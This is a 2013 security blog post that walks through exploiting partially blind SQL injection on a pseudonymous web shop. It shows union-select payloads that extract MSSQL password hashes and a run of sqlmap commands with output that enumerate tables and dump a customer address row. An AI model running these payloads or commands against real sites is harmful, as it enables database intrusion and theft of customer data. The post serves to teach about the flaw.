SpiderLabs Blog

You Injected What? Where? | Trustwave | SpiderLabs | Trustwave

Written by Theresa | Mar 5, 2013 6:00:00 AM

While harder to detect, there are still some instances of websites exploitable via partially blind SQL injection. For the purposes of this blog we're going to call the website AngryGrrl's Sock Puppets. It sells a variety of sock puppets of different media types. There is an extensive catalog even. Who knew?

On the main page of the website the search function of the database was not properly setup. By typing in ' union select master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;-- and hitting the submit button the follow page popped up on the webpage.

 

 

The nvarchar value'0x0100a95820034b6b6c41339a66ed558f99752abe8f9d8fd71d75' can be cracked to reveal the plaintext password of the union hashed password for the "sa" account. But what happens if you don't get the "sa" account and password?

By going back to the original webpage and typing in ' union select @@version;-- and hitting submit a different page pops up revealing theMicrosoft SQL server version and extra goodies.

 

 

Both of the resulting webpages of verbosity goodness reveal a partial blind SQL injection that can be used to access the internal database of AngryGrrl's Sock Puppets. Perhaps cardholder data, maybe personally identifiable information, or just the inventory of sock puppets could be had for a lot of time, but little effort.

In the instance of just finding the Microsoft SQL server version, the SQL map project is the best bet for grabbing the goods. A full comprehensive look at SQL map can be found at https-//github.com/sqlmapproject/sqlmap/wiki/Usage. Once it's installed you will need to have a few other pieces of the puzzle to continue. Using either Burp Suite or OWASP's ZAP web proxy, get a copy of the injection point via stacked query: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=from the web page request. This will be copied into the sqlmap.conf file for ease of use and accuracy. In this case, it will be calledsqlmap-sock.conf.

$./sqlmap.py -csqlmap- sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:17:53
[10:17:53] [INFO] testingconnection to the target url
[10:17:56] [INFO] testingif the url is stable, wait a few seconds
[10:17:59] [WARNING] urlis not stable, sqlmap will base the page comparison on a sequence matcher. Ifno dynamic nor injectable parameters are detected, or in case of junk results,refer to user's manual paragraph 'Page comparison' and provide a string orregular expression to match on
how do you want toproceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] [10:18:16] [INFO]heuristic test shows that POST parameter 'ctl00$ucDiscipleSelect$tbPromo' mightbe injectable (possible DBMS: Microsoft SQL Server)
[10:18:16] [INFO] testingfor SQL injection on POST parameter 'ctl00$ucDiscipleSelect$tbPromo
[10:18:16] [INFO] testing'AND boolean-based blind - WHERE or HAVING clause'
[10:18:17] [WARNING]reflective value(s) found and filtering out
[10:18:34] [INFO] testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[10:18:38] [INFO] testing'Microsoft SQL Server/Sybase stacked queries'
[10:18:51] [INFO] POSTparameter 'ctl00$ucDiscipleSelect$tbPromo' is 'Microsoft SQL Server/Sybasestacked queries' injectable
[10:18:51] [INFO] testing'Microsoft SQL Server/Sybase time-based blind'
[10:19:04] [INFO] POSTparameter 'ctl00$ucDiscipleSelect$tbPromo' is 'Microsoft SQL Server/Sybasetime-based blind' injectable
[10:19:04] [INFO] testing'Generic UNION query (NULL) - 1 to 20 columns'
[10:19:04] [INFO]automatically extending ranges for UNION query injection technique tests asthere is at least one other potential injection technique found
[10:19:19] [INFO] targeturl appears to be UNION injectable with 1 columns
[10:19:21] [INFO]checking if the injection point on POST parameter 'ctl00$ucDiscipleSelect$tbPromo'is a false positive
POST parameter'ctl00$ucDiscipleSelect$tbPromo' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] y
sqlmap identified thefollowing injection points with a total of 53 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

Type: AND/OR time-basedblind
Title: Microsoft SQL Server/Sybasetime-based blind
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

All of which delivers the following information:

---

[10:22:16] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

[10:22:16] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 26 times
[10:22:16] [INFO] fetcheddata logged to text files under'/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at10:22:16

Since the database has been verified, let's try for the current users:

$ ./sqlmap.py -c sqlmap-sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:36:38
[10:36:39] [INFO] testingconnection to the target url
sqlmap identified thefollowing injection points with a total of 0 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybasetime-based blind
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

[10:43:49] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[10:43:49] [INFO] fetching current user
[10:43:49] [INFO] resumed: webstore
current user: 'webstore'
[10:43:49] [INFO] testing if current user is DBA
[10:43:49] [WARNING] time-based comparison needs largerstatistical model. Making a few dummy requests, please wait..
current user is DBA: False
[10:43:58] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 1 times
[10:43:58] [INFO] fetched data logged to textfiles under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

We have the current user, who is unfortunately not the Database Administrator. But let's see what kind of access they do have…

$ ./sqlmap.py -c sqlmap-sock.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --file-read 'c:\webroot\SockPuppet\App_Code\GenericDataAccess.cs'

sqlmap/1.0-dev-e61c4c2 - automatic SQLinjection and database takeover tool
http://sqlmap.org

[!] legal disclaimer:Usage of sqlmap for attacking targets without prior mutual consent is illegal.It is the end user's responsibility to obey all applicable local, state andfederal laws. Developers assume no liability and are not responsible for anymisuse or damage caused by this program

[*] starting at 10:45:48
[10:45:48] [INFO] testingconnection to the target url
sqlmap identified thefollowing injection points with a total of 0 HTTP(s) requests:

---

Place: POST
Parameter:ctl00$ucDiscipleSelect$tbPromo
Type: stacked queries
Title: Microsoft SQL Server/Sybase stackedqueries
Payload:__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/

…snip…

[10:45:49] [INFO] the back-end DBMS is Microsoft SQLServer
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[10:45:49] [INFO] fetching file: 'c:/webroot/Sock_Puppets/App_Code/GenericDataAccess.cs'
[10:45:49] [WARNING] time-based comparison needs largerstatistical model. Making a few dummy requests, please wait..
[10:45:59] [WARNING] it is very important not to stressthe network adapter's bandwidth during usage of time-based queries
do you want sqlmap to try to optimize value(s) for DBMSdelay responses (option '--time-sec')? [Y/n] y
[10:47:09] [INFO] retrieved:
c:/webroot/SockPuppet/App_Code/GenericDataAccess.cs filesaved to: 'No data retrieved'
[10:47:17][INFO] fetched data logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

Bummer. Let's try something else.

$ ./sqlmap.py -c sqlmap-sock.conf --dbms 'Microsoft SQL Server 2005'-p 'ctl00%24ucDiscipleSelect%24tbPromo' --os-cmd ver

[11:28:09] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[11:28:09] [INFO]fetching database users password hashes
[11:28:09] [INFO]fetching database users
[11:28:09] [INFO]fetching number of database users
[11:28:09] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[11:28:22] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:29:26] [INFO] adjusting time delay to 2seconds due to good response times

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user --passwords

…snip…

[12:17:59] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[12:17:59] [INFO]fetching current user
[12:17:59] [INFO]resumed: webstore
current user: 'webstore'
[12:17:59] [INFO]fetching database users password hashes
[12:17:59] [INFO]fetching database users
[12:17:59] [INFO]fetching number of database users
[12:17:59] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[12:18:30] [CRITICAL]there is considerable lagging in connection response(s). Please use as highvalue for option '--time-sec' as possible (e.g. 10 or more)
[12:18:31] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
[12:18:51] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[12:18:51] [CRITICAL]unable to retrieve the number of database users
[12:18:51] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 1 times
[12:18:51] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'
[*] shutting down at12:18:51

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo'--current-user --privileges

…snip…

[16:39:25] [INFO] theback-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727,Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:39:25] [INFO] fetching tables for database:SOCKPUPPETS
[16:39:25] [INFO] fetching number of tables for database'SOCKPUPPETS'
[16:39:25] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[16:39:37] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[16:40:03] [INFO]adjusting time delay to 4 seconds due to good response times
[16:40:20] [ERROR]invalid character detected. retrying..
[16:40:20] [WARNING]increasing time delay to 5 seconds
60
[16:40:58] [INFO] retrieved: dbo.affil
[16:45:30] [ERROR]invalid character detected. retrying..
[16:45:30] [WARNING]increasing time delay to 6 seconds
iates
[16:47:57] [INFO] retrieved:dbo.commissionspaid
[16:57:06] [INFO] retrieved:dbo.COREMETRICS_CUSTO
[17:06:03] [ERROR]invalid character detected. retrying..
[17:06:03] [WARNING]increasing time delay to 7 seconds
[17:07:01] [ERROR]invalid character detected. retrying..
[17:07:01] [WARNING]increasing time delay to 8 seconds
[17:07:56] [ERROR]invalid character detected. retrying..
[17:07:56] [WARNING]increasing time delay to 9 seconds
[17:09:04] [ERROR] unableto properly validate last character value ('q')..
q

…snip…

[17:33:26] [INFO] retrieved:dbo.COREMETRICS_CUSTO
[17:38:13] [ERROR]invalid character detected. retrying..
[17:38:13] [WARNING]increasing time delay to 6 seconds
[17:38:53] [ERROR]invalid character detected. retrying..
[17:38:53] [WARNING]increasing time delay to 7 seconds
[17:39:37] [ERROR]invalid character detected. retrying..
[17:39:37] [WARNING]increasing time delay to 8 seconds
[17:40:19] [ERROR]invalid character detected. retrying..
[17:40:19] [WARNING]increasing time delay to 9 seconds
M_SOCK_PUPPETS
[17:45:27] [ERROR] unableto properly validate last character value ('T')..
T
[17:45:34] [INFO] retrieved:dbo.COREMETRICS_CUSTOM_SOCK_PUPPETS
[17:50:12] [INFO] retrieved: dbo.COREMETRICS_CUSTOM_SOCK_PUPPETS_TEST
[17:55:28] [ERROR]invalid character detected. retrying..
[17:55:28] [WARNING]increasing time delay to 5 seconds
01
[17:57:04] [INFO] retrieved: dbo.Customer_Address
[18:04:42] [INFO] retrieved: dbo.payment_type
[18:10:01] [ERROR]invalid character detected. retrying..
[18:10:01] [WARNING]increasing time delay to 6 seconds
rties
[18:12:53] [INFO] retrieved:dbo.ECOM_ITEMKEYWO
[18:20:18] [ERROR]invalid character detected. retrying..
[18:20:18] [WARNING]increasing time delay to 7 seconds
RDS
[18:47:41] [INFO] retrieved:dbo.ECOM_TEMP_CATCODES

…snip…

Looks like some database names have popped. Let's take a closer look at one of them.

$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --dump -T SOCKPUPPETS

…snip…

[20:49:54] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[20:49:54] [WARNING]missing database parameter. sqlmap is going to use the current database toenumerate table(s) entries
[20:49:54] [INFO]fetching current database
[20:49:54] [INFO] resumed:!
[20:49:54] [INFO]fetching columns for table 'SOCKPUPPETS' in database '!'
[20:49:54] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
[20:50:08] [CRITICAL]there is considerable lagging in connection response(s). Please use as highvalue for option '--time-sec' as possible (e.g. 10 or more)
[20:50:17] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
4
[20:50:26] [INFO] retrieved:
[20:50:34] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[20:50:34] [INFO]retrieved:
[20:50:43] [INFO]retrieved:
[20:50:50] [INFO]retrieved:
[20:50:58] [ERROR] unableto retrieve the columns for any table in database '!'
do you want to use commoncolumn existence check? [y/N/q] y
[20:51:35] [INFO]checking column existence using items from '/home/theresa/sqlmap-dev/txt/common-columns.txt'
[20:51:35] [INFO] addingwords used on web page to the check list
[20:55:06] [INFO]retrieved:log
[21:00:22] [INFO]retrieved:html_id
[21:05:13] [INFO]retrieved: price
[21:05:26] [INFO]retrieved: bot_id
[21:05:52] [INFO]retrieved:community
[21:06:06] [INFO]retrieved: list
[21:06:26] [INFO]retrieved: sub_image5
[21:06:42] [INFO]retrieved: sale_limit
[21:07:02] [INFO]retrieved: module_name
[21:07:39] [INFO]retrieved: main_image
[21:07:54] [INFO]retrieved: sub_large_image5
[21:08:13] [INFO]retrieved: main_list_comment
[21:09:25] [INFO]retrieved: created_at
[21:13:29] [INFO]retrieved: idclassificatore
[21:14:47] [INFO]retrieved: arcade
[21:15:26] [INFO]retrieved: tagname
[21:16:39] [INFO]retrieved: blogid
[21:17:02] [INFO]retrieved: downloads
[21:17:24] [INFO]retrieved: postdatetime
[21:17:38] [INFO]retrieved: pro_id

[21:18:02] [INFO]retrieved: does
[21:18:21] [INFO]retrieved: risks
[21:18:41] [INFO]retrieved: dakota
[21:18:58] [INFO]retrieved: northwest
[21:19:16] [INFO]retrieved: ceu
[21:19:29] [INFO]retrieved: log
[21:20:16] [INFO]retrieved: designed
[21:20:30] [INFO]retrieved: yukon
[21:21:20] [INFO]fetching entries for table 'SOCKPUPPETS' in database '!'
[21:21:20] [INFO]fetching number of entries for table 'SOCKPUPPETS' in database '!'
[21:21:20] [INFO]retrieved:
[21:21:23] [WARNING]unable to retrieve the number of entries for table 'SOCKPUPPETS' in database'!'
[21:21:23] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 2681 times
[21:21:23] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at21:21:23

twarnock@megalon:~/sqlmap-dev$ ./sqlmap.py -c sqlmap-scb.conf --dbms'Microsoft SQL Server 2005' -p 'ctl00%24ucDiscipleSelect%24tbPromo' --dump -Tdbo.Customer_Address -D SOCKPUPPETS

…snip…

[21:38:19] [INFO] theback-end DBMS is Microsoft SQL Server
web server operatingsystem: Windows Vista
web applicationtechnology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MicrosoftSQL Server 2005
[21:38:19] [INFO]fetching columns for table 'Customer_Address' in database 'SOCKPUPPETS'
[21:38:19] [WARNING]time-based comparison needs larger statistical model. Making a few dummyrequests, please wait..
do you want sqlmap to tryto optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[21:38:52] [WARNING] itis very important not to stress the network adapter's bandwidth during usage oftime-based queries
[21:39:06] [ERROR]invalid character detected. retrying..
[21:39:06] [WARNING]increasing time delay to 6 seconds
6
[21:39:37] [INFO]retrieved: C
[21:40:29] [ERROR]invalid character detected. retrying..
[21:40:29] [WARNING]increasing time delay to 7 seconds
UST_NO
[21:44:01] [INFO]retrieved: NA
[21:45:40] [ERROR]invalid character detected. retrying..
[21:45:40] [WARNING]increasing time delay to 8 seconds
ME_FULL
[21:50:26] [ERROR]invalid character detected. retrying..
[21:50:26] [WARNING]increasing time delay to 9 seconds
ONTH
[21:53:32] [INFO]retrieved: ST
[21:55:34] [ERROR]invalid character detected. retrying..
[21:55:34] [WARNING]increasing time delay to 10 seconds
REET
[22:02:34] [INFO]retrieved:CI
[22:03:57] [ERROR]invalid character detected. retrying..
[22:03:57] [WARNING]increasing time delay to 6 seconds
[22:04:44] [ERROR]invalid character detected. retrying..
[22:04:44] [WARNING]increasing time delay to 7 seconds
TY
[22:07:28] [ERROR] unableto properly validate last character value ('S')..
S
[22:08:01] [ERROR]invalid character detected. retrying..
[22:08:01] [WARNING]increasing time delay to 6 seconds
[22:08:38] [ERROR]invalid character detected. retrying..
[22:08:38] [WARNING]increasing time delay to 7 seconds
[22:09:18] [ERROR]invalid character detected. retrying..
[22:09:18] [WARNING]increasing time delay to 8 seconds
T
[22:10:58] [ERROR]invalid character detected. retrying..
[22:10:58] [WARNING]increasing time delay to 9 seconds
[22:11:43] [ERROR]invalid character detected. retrying..
[22:11:43] [WARNING]increasing time delay to 10 seconds
[22:12:19] [ERROR] unableto properly validate last character value ('A')..
A
[22:12:54] [ERROR]invalid character detected. retrying..
[22:12:54] [WARNING]increasing time delay to 6 seconds
T
[22:14:50] [ERROR]invalid character detected. retrying..
[22:14:50] [WARNING]increasing time delay to 7 seconds
[22:15:29] [ERROR] invalidcharacter detected. retrying..
[22:15:29] [WARNING]increasing time delay to 8 seconds
[22:16:03] [ERROR]invalid character detected. retrying..
[22:16:03] [WARNING]increasing time delay to 9 seconds
[22:16:54] [ERROR]invalid character detected. retrying..
[22:16:54] [WARNING]increasing time delay to 10 seconds
[22:17:39] [ERROR] unableto properly validate last character value ('E')..
E
[22:30:35] [INFO]retrieved: ZIP
[22:34:59] [INFO]fetching entries for table 'Customer_Address' in database 'SOCKPUPPET'[22:34:59] [INFO]fetching number of entries for table 'Customer_Address' in database 'SOCKPUPPET'
[22:34:59] [INFO]retrieved: 1
[22:35:10] [INFO]fetching number of distinct values for column 'CUST_NO'
[22:35:10] [INFO]retrieved: 1
[22:35:23] [INFO] usingcolumn 'CUST_NO' as a pivot for retrieving row data
[22:35:23] [INFO]retrieved:008675309
[22:39:45] [INFO]retrieved: DEREK_HALE
[22:40:31] [ERROR]invalid character detected. retrying..
[22:40:31] [WARNING]increasing time delay to 6 seconds
11 BEACON WAY
[22:41:14] [INFO]retrieved: BEACON HILLS
[22:43:13] [INFO]retrieved: CA
[22:43:37] [INFO]retrieved: 92677
[22:43:40] [WARNING] incase of continuous data retrieval problems you are advised to try a switch'--no-cast' and/or switch '--hex'
[22:43:40] [INFO]retrieved:
[22:43:44] [INFO]analyzing table dump for possible password hashes
Database: SOCKPUPPET
Table: dbo.Customer_Address
[1 entry]

+------------+--------------+--------------+---------------+---------------+----------------+

| CUST_NO | NAME_FULL | STREET | CITY | STATE | ZIP |

+------------+--------------+--------------+---------------+---------------+----------------+

| 008675309 | DEREK_HALE | 11 BEACON WAY | BEACON HILLS |CA | 92677 |

+------------+--------------+--------------+---------------+---------------+----------------+

[22:43:44] [INFO] table 'SOCKPUPPET.dbo.Customer_Address'dumped to CSV file '/home/twarnock/sqlmap-dev/output/www.angrygrrlssockpuppets.com/dump/SOCKPUPPET/Customer_Address.csv'
[22:43:44] [WARNING] HTTPerror codes detected during testing:
500 (Internal ServerError) - 20 times
[22:43:44] [INFO] fetcheddata logged to text files under '/home/theresa/sqlmap-dev/output/www.angrygrrlssockpuppets.com'

[*] shutting down at22:43:44

And there it is, the customer database with the first row listed out for your viewing pleasure. Further SQL injections might produce actual card holder data, items for sale, and various other goodies depending on the database.